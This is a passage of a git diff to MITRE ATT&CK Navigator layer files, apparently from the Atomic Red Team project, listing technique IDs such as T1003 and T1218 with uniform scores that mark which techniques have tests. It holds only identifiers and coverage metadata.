test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 323bade4..bef475a2 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled"